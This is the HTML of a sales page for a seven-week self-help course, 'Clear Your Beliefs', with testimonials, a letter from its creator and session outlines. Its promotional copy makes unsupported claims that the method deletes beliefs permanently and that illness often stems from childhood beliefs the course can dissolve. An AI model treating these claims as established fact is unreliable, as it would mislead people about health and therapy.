<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 